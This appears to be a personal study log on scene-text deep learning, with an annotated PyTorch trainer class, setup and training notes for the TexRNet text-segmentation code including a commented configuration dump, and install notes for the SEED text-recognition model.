      226
      227
      228
      229
      230
      231
      232
      233
      234
      235
      import time

      import torch
      import torchvision.utils as vutils
      from tqdm import tqdm

      from base import BaseTrainer
      from utils import WarmupPolyLR, runningScore, cal_text_score


# Requires: time, shutil, torch, torchvision.utils as vutils and tqdm,
# plus BaseTrainer and the utils imported above.
class Trainer(BaseTrainer):
    # __init__ takes the config, model, loss function (criterion), train and
    # validation data loaders, a metric class (metric_cls) and an optional
    # post-processing function (post_process).
    def __init__(self, config, model, criterion, train_loader, validate_loader, metric_cls, post_process=None):
        super(Trainer, self).__init__(config, model, criterion)
        # Read show_images_iter from the config and set up the data loaders. If a
        # validation loader is given, a post-processor and a metric class must be supplied too.
        self.show_images_iter = self.config['trainer']['show_images_iter']
        self.train_loader = train_loader
        if validate_loader is not None:
            assert post_process is not None and metric_cls is not None
        self.validate_loader = validate_loader
        self.post_process = post_process
        self.metric_cls = metric_cls
        self.train_loader_len = len(train_loader)
        # LR scheduler: when configured, WarmupPolyLR adjusts the learning rate
        # with a warmup phase followed by polynomial decay.
        if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
            warmup_iters = config['lr_scheduler']['args']['warmup_epoch'] * self.train_loader_len
            if self.start_epoch > 1:
                self.config['lr_scheduler']['args']['last_epoch'] = (self.start_epoch - 1) * self.train_loader_len
            self.scheduler = WarmupPolyLR(self.optimizer, max_iters=self.epochs * self.train_loader_len,
                                          warmup_iters=warmup_iters, **config['lr_scheduler']['args'])
        # Log the sample counts and loader lengths of the train/validation datasets.
        if self.validate_loader is not None:
            self.logger_info(
                'train dataset has {} samples,{} in dataloader, validate dataset has {} samples,{} in dataloader'.format(
                    len(self.train_loader.dataset), self.train_loader_len, len(self.validate_loader.dataset), len(self.validate_loader)))
        else:
            self.logger_info('train dataset has {} samples,{} in dataloader'.format(len(self.train_loader.dataset), self.train_loader_len))

    # _train_epoch runs the model through one full training epoch.
    def _train_epoch(self, epoch):
        # Put the model into training mode.
        self.model.train()
        # Record the epoch and batch start times.
        epoch_start = time.time()
        batch_start = time.time()
        train_loss = 0.
        running_metric_text = runningScore(2)
        # Initialise the accumulated loss, the running metrics and the current learning rate.
        lr = self.optimizer.param_groups[0]['lr']

        # Iterate over the batches of the training loader:
        for i, batch in enumerate(self.train_loader):
            if i >= self.train_loader_len:
                break
            self.global_step += 1
            lr = self.optimizer.param_groups[0]['lr']

            # Move every tensor in the batch onto the GPU.
            for key, value in batch.items():
                if value is not None:
                    if isinstance(value, torch.Tensor):
                        batch[key] = value.to(self.device)
            cur_batch_size = batch['img'].size()[0]

            # Forward pass: compute the predictions preds.
            preds = self.model(batch['img'])
            # Compute the losses, then backpropagate and step the optimizer.
            loss_dict = self.criterion(preds, batch)
            # backward
            self.optimizer.zero_grad()
            loss_dict['loss'].backward()
            self.optimizer.step()
            # When WarmupPolyLR is used, the scheduler is stepped every iteration.
            if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
                self.scheduler.step()
            # acc / iou: compute score_shrink_map on the shrink map.
            score_shrink_map = cal_text_score(preds[:, 0, :, :], batch['shrink_map'], batch['shrink_mask'], running_metric_text,
                                              thred=self.config['post_processing']['args']['thresh'])

            # Build a log string loss_str from the individual losses and
            # accumulate the total loss into train_loss.
            loss_str = 'loss: {:.4f}, '.format(loss_dict['loss'].item())
            for idx, (key, value) in enumerate(loss_dict.items()):
                loss_dict[key] = value.item()
                if key == 'loss':
                    continue
                loss_str += '{}: {:.4f}'.format(key, loss_dict[key])
                if idx < len(loss_dict) - 1:
                    loss_str += ', '

            train_loss += loss_dict['loss']
            acc = score_shrink_map['Mean Acc']
            iou_shrink_map = score_shrink_map['Mean IoU']

            # Every log_iter steps, report throughput (samples/sec), accuracy,
            # IoU, the losses and the current learning rate via self.logger_info,
            # so training can be monitored.
            if self.global_step % self.log_iter == 0:
                batch_time = time.time() - batch_start
                self.logger_info(
                    '[{}/{}], [{}/{}], global_step: {}, speed: {:.1f} samples/sec, acc: {:.4f}, iou_shrink_map: {:.4f}, {}, lr:{:.6}, time:{:.2f}'.format(
                        epoch, self.epochs, i + 1, self.train_loader_len, self.global_step, self.log_iter * cur_batch_size / batch_time, acc,
                        iou_shrink_map, loss_str, lr, batch_time))
                batch_start = time.time()

            # If TensorBoard is enabled (main process only), write the training
            # losses and metrics for visualisation.
            if self.tensorboard_enable and self.config['local_rank'] == 0:
                # write tensorboard
                for key, value in loss_dict.items():
                    self.writer.add_scalar('TRAIN/LOSS/{}'.format(key), value, self.global_step)
                self.writer.add_scalar('TRAIN/ACC_IOU/acc', acc, self.global_step)
                self.writer.add_scalar('TRAIN/ACC_IOU/iou_shrink_map', iou_shrink_map, self.global_step)
                self.writer.add_scalar('TRAIN/lr', lr, self.global_step)
                # Every show_images_iter steps, visualise the input images, the
                # ground truth and the model predictions; vutils.make_grid
                # arranges them into image grids.
                if self.global_step % self.show_images_iter == 0:
                    # show images on tensorboard
                    self.inverse_normalize(batch['img'])
                    self.writer.add_images('TRAIN/imgs', batch['img'], self.global_step)
                    # shrink_labels and threshold_labels
                    shrink_labels = batch['shrink_map']
                    threshold_labels = batch['threshold_map']
                    shrink_labels[shrink_labels <= 0.5] = 0
                    shrink_labels[shrink_labels > 0.5] = 1
                    show_label = torch.cat([shrink_labels, threshold_labels])
                    show_label = vutils.make_grid(show_label.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
                    self.writer.add_image('TRAIN/gt', show_label, self.global_step)
                    # model output
                    show_pred = []
                    for kk in range(preds.shape[1]):
                        show_pred.append(preds[:, kk, :, :])
                    show_pred = torch.cat(show_pred)
                    show_pred = vutils.make_grid(show_pred.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
                    self.writer.add_image('TRAIN/preds', show_pred, self.global_step)
        # Return the mean training loss, the learning rate, the elapsed time and the epoch index.
        return {'train_loss': train_loss / self.train_loader_len, 'lr': lr, 'time': time.time() - epoch_start,
                'epoch': epoch}

    def _eval(self, epoch):
        # eval() changes module behaviour, e.g. it disables dropout and freezes batch-norm statistics.
        self.model.eval()
        # torch.cuda.empty_cache()  # speed up evaluating after training finished
        # raw_metrics collects the per-batch metrics; total_frame and total_time
        # accumulate the number of processed frames and the elapsed time.
        raw_metrics = []
        total_frame = 0.0
        total_time = 0.0
        for i, batch in tqdm(enumerate(self.validate_loader), total=len(self.validate_loader), desc='test model'):
            # no_grad() skips gradient book-keeping, which saves memory and speeds things up.
            with torch.no_grad():
                # Move the batch tensors onto the GPU.
                for key, value in batch.items():
                    if value is not None:
                        if isinstance(value, torch.Tensor):
                            batch[key] = value.to(self.device)
                # Record the start time, then run the forward pass.
                start = time.time()
                preds = self.model(batch['img'])
                # Post-process the raw predictions into boxes and scores.
                boxes, scores = self.post_process(batch, preds, is_output_polygon=self.metric_cls.is_output_polygon)
                # Update the running statistics.
                total_frame += batch['img'].size()[0]
                total_time += time.time() - start
                # Compute and collect the per-batch evaluation metrics.
                raw_metric = self.metric_cls.validate_measure(batch, (boxes, scores))
                raw_metrics.append(raw_metric)
        # Aggregate the metrics over the whole validation set.
        metrics = self.metric_cls.gather_measure(raw_metrics)
        # Report throughput in frames per second (FPS).
        self.logger_info('FPS:{}'.format(total_frame / total_time))
        # Return the averaged metrics.
        return metrics['recall'].avg, metrics['precision'].avg, metrics['fmeasure'].avg

    def _on_epoch_finish(self):
        # Runs at the end of every epoch:
        # log the epoch summary, then handle checkpoints.
        self.logger_info('[{}/{}], train_loss: {:.4f}, time: {:.4f}, lr: {}'.format(
            self.epoch_result['epoch'], self.epochs, self.epoch_result['train_loss'], self.epoch_result['time'],
            self.epoch_result['lr']))
        # Checkpoint paths.
        net_save_path = '{}/model_latest.pth'.format(self.checkpoint_dir)
        net_save_path_best = '{}/model_best.pth'.format(self.checkpoint_dir)

        # Only the main process saves checkpoints.
        if self.config['local_rank'] == 0:
            # Save the latest checkpoint.
            self._save_checkpoint(self.epoch_result['epoch'], net_save_path)
            save_best = False
            if self.validate_loader is not None and self.metric_cls is not None:  # use F1 as the best-model criterion
                # Evaluate on the validation set (when a loader and metric class exist).
                recall, precision, hmean = self._eval(self.epoch_result['epoch'])

                # Log the evaluation metrics to TensorBoard when enabled.
                if self.tensorboard_enable:
                    self.writer.add_scalar('EVAL/recall', recall, self.global_step)
                    self.writer.add_scalar('EVAL/precision', precision, self.global_step)
                    self.writer.add_scalar('EVAL/hmean', hmean, self.global_step)
                self.logger_info('test: recall: {:.6f}, precision: {:.6f}, f1: {:.6f}'.format(recall, precision, hmean))

                # Keep the best model by F1 score (hmean); without a validation
                # set, fall back to the lowest training loss.
                if hmean >= self.metrics['hmean']:
                    save_best = True
                    self.metrics['train_loss'] = self.epoch_result['train_loss']
                    self.metrics['hmean'] = hmean
                    self.metrics['precision'] = precision
                    self.metrics['recall'] = recall
                    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
            else:
                if self.epoch_result['train_loss'] <= self.metrics['train_loss']:
                    save_best = True
                    self.metrics['train_loss'] = self.epoch_result['train_loss']
                    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
            # Log the current best metrics and copy the checkpoint when it improves.
            best_str = 'current best, '
            for k, v in self.metrics.items():
                best_str += '{}: {:.6f}, '.format(k, v)
            self.logger_info(best_str)
            if save_best:
                import shutil
                shutil.copy(net_save_path, net_save_path_best)
                self.logger_info("Saving current best: {}".format(net_save_path_best))
            else:
                self.logger_info("Saving checkpoint: {}".format(net_save_path))

    def _on_train_finish(self):
        # Runs once training is complete:
        # dump every tracked metric, then log completion.
        for k, v in self.metrics.items():
            self.logger_info('{}:{}'.format(k, v))
        self.logger_info('finish train')
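For context, WarmupPolyLR combines a linear warmup phase with polynomial decay. A minimal sketch of the kind of schedule it implements, with illustrative argument names and defaults (not necessarily the repo's exact ones):

def warmup_poly_lr(step, base_lr, max_iters, warmup_iters, warmup_factor=1.0 / 3, power=0.9):
    # Linear warmup: ramp from base_lr * warmup_factor up to base_lr.
    if step < warmup_iters:
        alpha = step / warmup_iters
        return base_lr * (warmup_factor * (1 - alpha) + alpha)
    # Polynomial decay towards zero over the remaining iterations.
    return base_lr * (1 - (step - warmup_iters) / (max_iters - warmup_iters)) ** power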

SynthText is a synthetic dataset of 800k images, synthesized from 8k background images. This dataset is only used to pre-train the model.

Data augmentation for the training data includes: (1) random rotation with an angle in the range (-10°, 10°); (2) random cropping; (3) random flipping.

Paper: Rethinking Text Segmentation: A Novel Dataset and A Text-Specific Refinement Approach

Configuration

1. Create a new conda environment:

conda create -n texrnet python=3.7
conda activate texrnet
2. Install PyTorch offline (I have been burned n times and am slowly getting the hang of it, orz; the offline route just works): download the matching torch and torchvision wheels from download.pytorch.org/whl/torch_stable.html.

For some reason Edge was downloading unusually slowly today, so I used Thunder instead.

pip install torch-1.13.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install torchvision-0.14.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

3. In the repo directory, delete torch==1.6 and torchvision==0.7 from requirement.txt, then run:

pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
4. In the repo directory, create the folders the code expects:

Training

Hold on a second! Turning cfg.DATA.NUM_WORKERS_PER_GPU down in train_utils.py makes it run again!

if not cfg.DEBUG:
    cfg.DATA.NUM_WORKERS_PER_GPU = 2
    cfg.TRAIN.BATCH_SIZE_PER_GPU = 2
    cfg.TRAIN.OPTIM_MANAGER_LRSCALE = {
        'hrnet': 1, 'texrnet': 10}
return cfg

Well, it still won't run. Argh!

File "D:\Study\XXXXX\Rethinking-Text-Segmentation\lib\torchutils.py", line 262, in __call__
    return y
UnboundLocalError: local variable 'y' referenced before assignment
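That error means that by the time __call__ reaches return y, no branch has ever assigned y; typically some input falls through every if/elif without a match. A minimal, hypothetical repro of the pattern (not the repo's actual code):

def lr_value(schedule, step):
    if schedule == 'linear':
        y = 0.01 * step / 500
    elif schedule == 'poly':
        y = 0.01 * (1 - step / 20000) ** 0.9
    # If schedule matches neither branch, y is never bound...
    return y  # ...and Python raises UnboundLocalError right here.

So the first thing to check is which schedule strings torchutils.py actually handles, and what the config is passing in.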

istrain = not args.eval: if eval mode is not requested, we are in train mode.

# Select the train or eval configuration.
if istrain:
    cfg = copy.deepcopy(cfg_train)
else:
    cfg = copy.deepcopy(cfg_test)

if istrain:
    # In train mode, get_experiment_id() returns a fresh experiment ID, stored in
    # cfg.EXPERIMENT_ID. Every run gets a new ID so that multiple training runs
    # can be told apart.
    cfg.EXPERIMENT_ID = get_experiment_id()
else:
    # Not inside any experiment.
    cfg.EXPERIMENT_ID = None

# Pick the dataset config.
if args.dsname == "textseg":
    cfg_data = cfg_textseg
elif args.dsname == "cocots":
    cfg_data = cfg_cocots
elif args.dsname == "mlt":
    cfg_data = cfg_mlt
elif args.dsname == "icdar13":
    cfg_data = cfg_icdar13
elif args.dsname == "totaltext":
    cfg_data = cfg_totaltext
else:
    raise ValueError

cfg.DEBUG = args.debug
cfg.DIST_URL = 'tcp://127.0.0.1:{}'.format(args.port)
if args.gpu is None:
    # No GPU specified: use all of them.
    cfg.GPU_DEVICE = 'all'
else:
    # Use the specified GPU(s).
    cfg.GPU_DEVICE = args.gpu

# Attach the model and data configs.
cfg.MODEL = copy.deepcopy(cfg_mdel)
cfg.DATA = copy.deepcopy(cfg_data)

if istrain:
    cfg = set_cfg_train(cfg, dsname=args.dsname)
    if args.hrnet:
        # Configure the HRNet-W48 model for training.
        cfg = set_cfg_hrnetw48_train(cfg)
else:
    cfg = set_cfg_eval(cfg, dsname=args.dsname)
    if args.hrnet:
        cfg = set_cfg_hrnetw48_eval(cfg)
    # Load the pretrained model.
    cfg.MODEL.TEXRNET.PRETRAINED_PTH = args.pth

# Pick the dataset split.
if istrain:
    if args.dsname == "textseg":
        cfg.DATA.DATASET_MODE = 'train+val'
    elif args.dsname == "cocots":
        cfg.DATA.DATASET_MODE = 'train'
    elif args.dsname == "mlt":
        cfg.DATA.DATASET_MODE = 'trainseg'
    elif args.dsname == "icdar13":
        cfg.DATA.DATASET_MODE = 'train_fst'
    elif args.dsname == "totaltext":
        cfg.DATA.DATASET_MODE = 'train'
    else:
        raise ValueError
else:
    if args.dsname == "textseg":
        cfg.DATA.DATASET_MODE = 'test'
    elif args.dsname == "cocots":
        cfg.DATA.DATASET_MODE = 'val'
    elif args.dsname == "mlt":
        cfg.DATA.DATASET_MODE = 'valseg'
    elif args.dsname == "icdar13":
        cfg.DATA.DATASET_MODE = 'test_fst'
    elif args.dsname == "totaltext":
        cfg.DATA.DATASET_MODE = 'test'
    else:
        raise ValueError

if istrain:
    if args.trainwithcls:  # train together with the character classifier
        if args.dsname == 'textseg':  # dataset-specific pipelines
            cfg.DATA.LOADER_PIPELINE = [
                'NumpyImageLoader',        # read image data via numpy
                'TextSeg_SeglabelLoader',  # load the text-region segmentation labels
                'CharBboxSpLoader', ]      # load the character bounding boxes (all used for text detection/segmentation)
            cfg.DATA.RANDOM_RESIZE_CROP_SIZE = [32, 32]     # random-crop output size
            cfg.DATA.RANDOM_RESIZE_CROP_SCALE = [0.8, 1.2]  # scale range
            cfg.DATA.RANDOM_RESIZE_CROP_RATIO = [3/4, 4/3]  # aspect-ratio range
            cfg.DATA.TRANS_PIPELINE = [
                'UniformNumpyType',                  # unify the numpy dtypes for later processing
                'TextSeg_RandomResizeCropCharBbox',  # random rescale/crop of seg labels and char boxes, for robustness
                'NormalizeUint8ToZeroOne',           # map pixel values from [0, 255] to [0, 1]
                'Normalize',                         # zero-mean / unit-variance standardisation
                'RandomScaleOneSide',                # rescale one side, for robustness to image scale
                'RandomCrop',                        # random crop
            ]
        elif args.dsname == 'icdar13':
            cfg.DATA.LOADER_PIPELINE = [
                'NumpyImageLoader',    # read image data via numpy
                'SeglabelLoader',      # load the text-region segmentation labels
                'CharBboxSpLoader', ]  # load the character bounding boxes
            cfg.DATA.TRANS_PIPELINE = [
                'UniformNumpyType',         # unify the numpy dtypes for later processing
                'NormalizeUint8ToZeroOne',  # map pixel values from [0, 255] to [0, 1]
                'Normalize',                # zero-mean / unit-variance standardisation
                'RandomScaleOneSide',       # rescale one side, for robustness to image scale
                'RandomCrop',               # random crop
            ]
        else:
            raise ValueError
        # Format the samples into text regions plus character-box labels for training.
        cfg.DATA.FORMATTER = 'SemChinsChbbxFormatter'
        # Square the character boxes to make RoI pooling easier.
        cfg.DATA.LOADER_SQUARE_BBOX = True
        # Which stage the random resize-crop starts from; 'sem' = the semantic-segmentation stage.
        cfg.DATA.RANDOM_RESIZE_CROP_FROM = 'sem'
        # Which stage the in-training predictions are taken from; also 'sem'.
        cfg.MODEL.TEXRNET.INTRAIN_GETPRED_FROM = 'sem'
        # the one with 93.98% and trained on semantic crops
        # Path to the pretrained classifier.
        cfg.TRAIN.CLASSIFIER_PATH = osp.join(
            'pretrained', 'init', 'resnet50_textcls.pth',
        )
        # How boxes are padded for RoI pooling; 'semcrop' here.
        cfg.TRAIN.ROI_BBOX_PADDING_TYPE = 'semcrop'
        # Output size of RoI align.
        cfg.TRAIN.ROI_ALIGN_SIZE = [32, 32]
        # Whether the classifier itself is updated.
        cfg.TRAIN.UPDATE_CLASSIFIER = False
        # After how many iterations of the semantic stage the classifier kicks in.
        cfg.TRAIN.ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER = 0
        # Loss weights: semantic segmentation, refinement (RFN), RFN trimap, classifier.
        cfg.TRAIN.LOSS_WEIGHT = {
            'losssem'   : 1,
            'lossrfn'   : 0.5,
            'lossrfntri': 0.5,
            'losscls'   : 0.1,
        }

if istrain:
    # Use HRNet as the segmentation backbone when requested, otherwise DeepLab.
    if args.hrnet:
        cfg.TRAIN.SIGNATURE = ['texrnet', 'hrnet']
    else:
        cfg.TRAIN.SIGNATURE = ['texrnet', 'deeplab']
    # LOG_DIR: in train mode a fresh experiment folder is created and the log is
    # written to 'train.log' inside it.
    cfg.LOG_DIR = experiment_folder(cfg, isnew=True, sig=cfg.TRAIN.SIGNATURE)
    cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'train.log')
else:
    # In eval mode the log goes to 'eval.log'.
    cfg.LOG_DIR = osp.join(cfg.MISC_DIR, 'eval')
    cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'eval.log')
    cfg.TEST.SUB_DIR = None

if cfg.DEBUG:
    # In debug mode, pin the experiment ID to 999999999999 so debug runs are easy to spot.
    cfg.EXPERIMENT_ID = 999999999999
    # Dataloader workers per GPU.
    cfg.DATA.NUM_WORKERS_PER_GPU = 0
    # Batch size per GPU.
    cfg.TRAIN.BATCH_SIZE_PER_GPU = 2

cfg = common_initiates(cfg)  # loads the train/test data and runs preprocessing, normalisation, etc.

if istrain:
    if args.trainwithcls:
        # Training stages; ts_with_classifier() is used when the classifier is on.
        exec_ts = ts_with_classifier()
    else:
        # Plain training stages via ts().
        exec_ts = ts()
    # The trainer object.
    trainer = train(cfg)
    # Register the stages with the trainer (data loading, forward, backward, parameter updates, ...).
    trainer.register_stage(exec_ts)

    # trainer(0)
    # Spawn one process per GPU (nprocs=GPU_COUNT) for parallel training;
    # join=True blocks here until every process has finished.
    mp.spawn(trainer,
             args=(),
             nprocs=cfg.GPU_COUNT,
             join=True)
else:
    # Evaluation stages.
    exec_es = es()
    # The tester object ('eval' is the repo's evaluator class; it shadows the builtin).
    tester = eval(cfg)
    # Register the stages with the tester (data loading, forward, metrics, ...).
    tester.register_stage(exec_es)

    # tester(0)
    # Spawn one process per GPU for parallel evaluation; join=True blocks until done.
    mp.spawn(tester,
             args=(),
             nprocs=cfg.GPU_COUNT,
             join=True)
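A note on the mp.spawn pattern: torch.multiprocessing.spawn invokes its first argument as fn(rank, *args), so trainer must be callable with the process rank as its first parameter; the commented-out trainer(0) is just a single-process run at rank 0. A self-contained sketch of the same pattern:

import torch.multiprocessing as mp

def worker(rank, message):
    # Each spawned process receives its rank (0 to nprocs-1) as the first argument.
    print('process', rank, message)

if __name__ == '__main__':
    mp.spawn(worker, args=('hello',), nprocs=2, join=True)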

When the run starts, it prints the full configuration:

{'COMPUTER_NAME': 'OMEN',  // machine name
'CUDA': True, // whether CUDA is available
'DATA': {'ALIGN_CORNERS': True, // whether to align the image corners
'CLASS_NAME': ['background', 'text'], // class names; here there are two, 'background' and 'text'
'CLASS_NUM': 2, // number of classes
'DATASET_MODE': 'train+val', // dataset split; here the training and validation sets are used together
'DATASET_NAME': 'textseg', // dataset name, 'textseg' in this case
'EFFECTIVE_CLASS_NUM': 2, // number of effective classes
'FORMATTER': 'SemChinsChbbxFormatter', // name of the data formatter
'IGNORE_LABEL': 999, // label value to ignore, 999 here
'IM_MEAN': [0.485, 0.456, 0.406], // per-channel image mean
'IM_STD': [0.229, 0.224, 0.225], // per-channel image standard deviation
'LOADER_DERIVED_CLS_MAP_TO': 'bg', // class name the loader maps derived classes to
'LOADER_PIPELINE': ['NumpyImageLoader', // data loading pipeline
'TextSeg_SeglabelLoader',
'CharBboxSpLoader'],
'LOADER_SQUARE_BBOX': True, // whether character bboxes are squared at load time
'LOAD_BACKEND_IMAGE': 'pil', // image-reading backend
'LOAD_IS_MC_IMAGE': False, // whether the image is multi-channel
'LOAD_IS_MC_SEGLABEL': True, // whether the loaded label is multi-channel
'NUM_WORKERS': 5, // number of data-loading workers
'NUM_WORKERS_PER_GPU': 5, // data-loading workers per GPU
'RANDOM_CROP_FILL': {'image': [0, 0, 0], 'seglabel': [999]}, // fill values used when random-cropping
'RANDOM_CROP_PADDING_MODE': 'random', // padding mode, 'random' here
'RANDOM_CROP_SIZE': [513, 513], // output size of the random crop
'RANDOM_RESIZE_CROP_FROM': 'sem', // resize the semantic label to the target size before random-cropping
'RANDOM_RESIZE_CROP_RATIO': [0.75, 1.3333333333333333], // aspect-ratio range for the resize
'RANDOM_RESIZE_CROP_SCALE': [0.8, 1.2], // scale range for the resize
'RANDOM_RESIZE_CROP_SIZE': [32, 32], // minimum semantic-label size required before the resize
'RANDOM_SCALE_ONESIDE_ALIGN_CORNERS': True, // whether to align the image corners
'RANDOM_SCALE_ONESIDE_DIM': 'shortside', // which side is scaled; here the short side
'RANDOM_SCALE_ONESIDE_RANGE': [513, 1025], // size range for the scaling
'ROOT_DIR': 'D:\\Study\\XXX\\TextSeg', // dataset root directory
'SEGLABEL_IGNORE_LABEL': 999, // label value to ignore, 999 here
'SEMANTIC_PICK_CLASS': 'all', // which semantic classes to pick, 'all' here
'TRANS_PIPELINE': ['UniformNumpyType', // image preprocessing pipeline
'TextSeg_RandomResizeCropCharBbox',
'NormalizeUint8ToZeroOne',
'Normalize',
'RandomScaleOneSide',
'RandomCrop'],
'TRY_SAMPLE': None}, // number of samples to try
'DEBUG': False, // whether debug mode is on
'DIST_BACKEND': 'gloo', // distributed-training backend, 'gloo' here
'DIST_URL': 'tcp://127.0.0.1:11233', // distributed-training URL
'EXPERIMENT_ID': 168471973979, // experiment ID
'GPU_COUNT': 1, // number of GPUs used
'GPU_DEVICE': [0], // GPU indices used
'LOG_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet', // log directory
'LOG_FILE': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet\\train.log', // log file path
'MAINLOOP_EXECUTE': True, // whether to run the main loop
'MAIN_CODE': ['main.py', 'train_utils.py', 'eval_utils.py'], // main code files
'MAIN_CODE_PATH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation', // code path
'MATPLOTLIB_MODE': 'Agg', // matplotlib backend
'MISC_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log', // directory for miscellaneous files
// model configuration, including the HRNet hyper-parameters and structure
'MODEL': {'HRNET': {'ALIGN_CORNERS': True, // whether align_corners is used
'BN_MOMENTUM': 'hardcoded to 0.1', // batch-norm momentum
'FINAL_CONV_KERNEL': 1, // kernel size of the final convolution
'IGNORE_LABEL': 999, // ignored label value
'INTRAIN_GETPRED': False, // whether predictions are computed during training
'LOSS_TYPE': 'ce', // loss type
'MODEL_TAGS': ['v0', 'base'], // model tags
'OUTPUT_CHANNEL_NUM': 720, // number of output channels
'PRETRAINED_PTH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\pretrained\\init\\hrnetv2_w48_imagenet_pretrained.pth.base', // pretrained weights path
'STAGE1_PARA': {'BLOCK': 'BOTTLENECK', // block type used in HRNet
'FUSE_METHOD': 'SUM', // how features are fused across HRNet branches
'NUM_BLOCKS': [4], // blocks per branch
'NUM_BRANCHES': 1, // number of branches
'NUM_CHANNELS': [64], // channels per branch
'NUM_MODULES': 1}, // number of modules
'STAGE2_PARA': {'BLOCK': 'BASIC',
'FUSE_METHOD': 'SUM',
'NUM_BLOCKS': [4, 4],
'NUM_BRANCHES': 2,
'NUM_CHANNELS': [48, 96],
'NUM_MODULES': 1},
'STAGE3_PARA': {'BLOCK': 'BASIC',
'FUSE_METHOD': 'SUM',
'NUM_BLOCKS': [4, 4, 4],
'NUM_BRANCHES': 3,
'NUM_CHANNELS': [48, 96, 192],
'NUM_MODULES': 4},
'STAGE4_PARA': {'BLOCK': 'BASIC',
'FUSE_METHOD': 'SUM',
'NUM_BLOCKS': [4, 4, 4, 4],
'NUM_CHANNELS': [48, 96, 192, 384],
'NUM_BRANCHES': 4,
'NUM_MODULES': 3}},
'MODEL_NAME': 'texrnet', // model name
'TEXRNET': {'ALIGN_CORNERS': True, // whether align_corners is used
'BIAS_ATTENTION_TYPE': 'cossim', // bias-attention type
'BN_TYPE': 'bn', // batch-norm type
'CONV_TYPE': 'conv', // convolution type
'INIT_BIAS_ATTENTION_WITH': None, // which attention layer initialises the bias attention
'INPUT_CHANNEL_NUM': 720, // input tensor channels
'INTRAIN_GETPRED_FROM': 'sem', // where in-training predictions come from; 'sem' = the semantic-segmentation branch
'MODEL_TAGS': ['hrnet'], // model tags
'PRETRAINED_PTH': None, // pretrained weights path
'REFINEMENT_CHANNEL_NUM': [725, 64, 64], // output channels of the refinement layers
'REFINEMENT_LOSS_TYPE': {'lossrfn': 'ce', // loss types inside the refinement module
'lossrfntri': 'trimapce'},
'RELU_TYPE': 'relu', // ReLU type
'SEMANTIC_CLASS_NUM': 2, // number of semantic classes
'SEMANTIC_IGNORE_LABEL': 999, // ignored label in the semantic branch
'SEMANTIC_LOSS_TYPE': 'ce'}}, // semantic-segmentation loss type
'RND_RECORDING': False, // whether the RNG state is recorded
'RND_SEED': 2, // random seed
'SAVE_CODE': True, // whether the code is saved
'TORCH_VERSION': '1.13.1+cu117', // PyTorch version
'TRAIN': {'ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER': 0, // iteration after which the classifier is activated for the seg model
'ACTIVATE_REFINEMENT_AT_ITER': 0, // iteration at which the refinement module is activated
'BATCH_SIZE': 5, // batch size
'BATCH_SIZE_PER_GPU': 5, // batch size per GPU
'CKPT_EVERY': inf, // how often (in epochs) the weights are checkpointed
'CLASSIFIER_PATH': 'pretrained\\init\\resnet50_textcls.pth', // classifier path
'COMMENT': '>>>>later<<<<', // free-form comment for the run
'DISPLAY': 10, // log every this many iterations
'LOSS_WEIGHT': {'losscls': 0.1, // per-loss weights
'lossrfn': 0.5,
'lossrfntri': 0.5,
'losssem': 1},
'LOSS_WEIGHT_NORMALIZED': False, // whether the loss weights are normalised
'LR_BASE': 0.01, // base learning rate
'LR_ITER_BY': 'iter', // how the LR advances; 'iter' = per iteration
'LR_TYPE': [('linear', 0, 0.01, 500), ('ploy', 0.01, 0, 20000, 0.9)], // LR schedule: 'linear' warmup then 'ploy' (i.e. polynomial) decay
'MAX_STEP': 20500, // maximum number of iterations or epochs
'MAX_STEP_TYPE': 'iter', // unit of MAX_STEP; 'iter' = counted in iterations
'OPTIMIZER': 'sgd', // optimiser type; 'sgd' = stochastic gradient descent
'OPTIM_MANAGER_LRSCALE': {'hrnet': 1, 'texrnet': 10}, // per-module LR scales in the optimiser, keyed by 'hrnet' and 'texrnet'
'OVERFIT_A_BATCH': False, // whether to overfit a single batch (a debugging aid)
'ROI_ALIGN_SIZE': [32, 32], // Region of Interest (RoI) Align output size
'ROI_BBOX_PADDING_TYPE': 'semcrop', // bbox padding type used for RoI Align
'SAVE_CODE': True, // whether the code is saved
'SAVE_INIT_MODEL': True, // whether the initial model is saved
'SGD_MOMENTUM': 0.9, // SGD momentum
'SGD_WEIGHT_DECAY': 0.0005, // SGD weight decay
'SIGNATURE': ['texrnet', 'hrnet'], // model signature
'SKIP_PARTIAL': True, // whether to skip partial data
'UPDATE_CLASSIFIER': False, // whether the classifier parameters are updated
'USE_OPTIM_MANAGER': True, // whether the optimiser manager is used
'VISUAL': False}} // whether visualisation is on
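A plausible reading of LR_TYPE above (consistent with a warmup-plus-poly schedule and with MAX_STEP = 20500): a linear ramp from 0 to 0.01 over the first 500 iterations, then polynomial decay from 0.01 towards 0 over the next 20000 iterations with power 0.9, i.e. roughly

    lr(t) = 0.01 * (1 - (t - 500) / 20000) ** 0.9    for t >= 500

('ploy' appears to be the repo's spelling of 'poly'.)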
Paper: SEED: Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition

Code

Download the code from Pay20Y/SEED (github.com), and delete the torch entries from requirement.txt.

Install!

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

It dies partway through because pycocotools fails to build; fix it with:

sudo apt-get install gcc build-essential

Continue. Then scipy fails too; delete it from requirement.txt and reinstall until there are no errors.


Download the pretrained language model cc.en.300.bin from "Word vectors for 157 languages" on the fastText site.
